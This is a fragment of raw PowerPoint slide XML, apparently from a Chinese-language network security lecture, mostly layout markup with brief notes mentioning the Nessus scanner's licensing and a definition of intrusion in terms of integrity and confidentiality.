                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6482891B-DCFA-47B8-827A-360EE817D2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8132" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C3FB6E-932F-4C78-90F0-1653D4F7E7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7B0F9A0-9901-42BC-8CF4-32C112C29545}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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4F119CB-30C3-4A20-823D-EE735BA902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2540A30-9B4D-4B1D-AC32-45722273B67E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772B2C22-F0C1-46AF-8448-2BF99F13F967}"/>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25F34B9A-E7C0-4A6A-BE84-0347D7CD70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tx1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3404837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40116D-0AA9-4E12-A89D-FDE342DC93E6}"/>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9505B867-9FAC-4245-AA8B-6F86A100FD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0180" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02FC809-131C-4AA5-86BA-788232D1ED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F20CF3B-9D0E-4977-81FA-A174B1C37AFA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32</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34501947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B240116D-0AA9-4E12-A89D-FDE342DC93E6}"/>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9505B867-9FAC-4245-AA8B-6F86A100FD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0180" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02FC809-131C-4AA5-86BA-788232D1ED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F20CF3B-9D0E-4977-81FA-A174B1C37AFA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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43C5704E-2121-4177-84CF-275C3753FC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB82B3B-F08E-4DB7-A46B-12A68140F5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28" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C192DB3A-B98E-42AB-84EC-550EA58DAF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2EA711C-18F5-4D96-A772-BEB9C326861C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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292A93E8-591B-4CDD-A39F-5226B39AFC08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B585235D-78FE-4EF2-8145-CBFC3951C8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76" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F93B2B21-D029-49F4-B70C-A112D19BFF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500E73E-085D-429F-B564-4BBC5A15B652}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D6BA8F-66C6-412E-9345-6F8C45DCE2D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86335883-72A0-45A7-BB57-5A9362EECC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6324" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBAB352C-604E-442B-82FF-6CC2EDD128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B069DA2A-D7E5-46DE-80A6-34C860D1D910}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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F53BDBE0-4903-4D2A-9C11-9AA5E71F8415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{155D4DC5-A11C-4F39-A626-F70E326931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372" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2175C4CB-150A-4991-90F2-02D14A5795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F4892A6-FB2F-43BD-880C-569935A8C998}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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4B8C4BF0-0869-46C4-AC64-89EC8ECFC381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FCB88E-F98C-4025-8915-AB389E8466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0420" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885A2BA3-E063-4491-AFB1-A524F50772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0C8ACE42-812A-4AB3-9DC9-BE95B5A9EA2A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B8C4BF0-0869-46C4-AC64-89EC8ECFC381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FCB88E-F98C-4025-8915-AB389E8466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0420" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885A2BA3-E063-4491-AFB1-A524F50772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0C8ACE42-812A-4AB3-9DC9-BE95B5A9EA2A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627270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1921D9D9-614D-47DD-BA5E-15B4147E70C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72DDEE78-AEF1-4541-92E9-0D94CDA7AA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68" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064D47D3-681A-4921-8230-3BFD0ADD253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EFCF2CDE-DB9E-4CDF-9C40-CAB6D9AC91FC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">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2338B518-73E7-4766-B014-26395F4D512D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57567ACA-858D-424B-AB34-66303CBCEE9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588" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF919471-F6A8-45AE-B368-DD3F16B121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0DA9B22-387C-4FDE-B1D8-91BA431B3D39}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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4F119CB-30C3-4A20-823D-EE735BA902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2540A30-9B4D-4B1D-AC32-45722273B67E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772B2C22-F0C1-46AF-8448-2BF99F13F967}"/>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25F34B9A-E7C0-4A6A-BE84-0347D7CD70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Clr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4518188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1404D901-DC41-4903-B6DE-9477B227997C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF37644-0C15-48F1-A7F1-BBCFCE1AD3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804" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4953E819-88D2-4601-9DEF-9E88466DD7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9FE3472-CFF3-4C99-9C64-34D5E6BF7E0F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">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E5DA112C-5AA7-435B-8FB1-E5999665EC1E}"/>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8B3CA07E-5981-482E-A788-BF1ED2E07A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Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对个人用户是免费的，只需要在官方网站上填邮箱，立马就能收到注册号了，对应商业用户是收费的。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D11E3B56-55B3-4B2C-AB02-9B80458D1954}"/>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B7C8CDD4-245E-423D-9B5E-A451D6892BA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Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对个人用户是免费的，只需要在官方网站上填邮箱，立马就能收到注册号了，对应商业用户是收费的。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7375DB3B-6C87-48B9-AD9D-396DCEB4B7F3}"/>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F54732E2-0F57-4382-8EDE-EC1A56F666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2CE61B35-4AB2-4CF9-B1F6-EFDD5D001435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E545EBCA-4BC9-4EB0-8B7B-3E93395251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7169FEB4-ABBE-4A7A-B9FE-604541AEE47F}"/>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3FD682CE-53A4-4CDE-A755-304676AEAB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3D3F554-4453-49DE-8712-AC305E7DD800}"/>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CD51A36A-649A-4A4B-A79A-91E28860B2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDD71B51-44A9-4BD1-930E-8BAD58622BA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123907" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC60A579-03FF-4B9C-BA87-3A810EF678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08" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E529804-DF6F-4A98-934C-2CC52FA762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D229D01-52AE-40C1-94A8-77BFB3575790}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F679F24-F8C4-446C-B4CB-B1B5255B36A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141315" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09738DFD-C3A2-4A8F-9625-4508DB52DD1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1316" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFD4DD1-3F57-423F-919B-EE329B14FF5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0B32A9C-A9F0-43F1-B274-2310EE465F1E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86637620-2BFB-42F2-940D-0ECA6DF6B4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D167F99-C927-4BE2-8DD2-1ED3EE145509}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224259" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{743F3440-E656-4260-80CF-95A3D3FB7F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224260" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB55828C-0CB9-4278-A5C3-4BD53E89E0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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190864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14F119CB-30C3-4A20-823D-EE735BA902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2540A30-9B4D-4B1D-AC32-45722273B67E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772B2C22-F0C1-46AF-8448-2BF99F13F967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F34B9A-E7C0-4A6A-BE84-0347D7CD70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入侵是指未经授权蓄意尝试访问信息、窜改信息，使系统不可靠或不能使用的行为。它企图破坏计算</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>机资源的：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>完整性(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Integrity)：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指数据未经授权不能被改变。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>机密性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
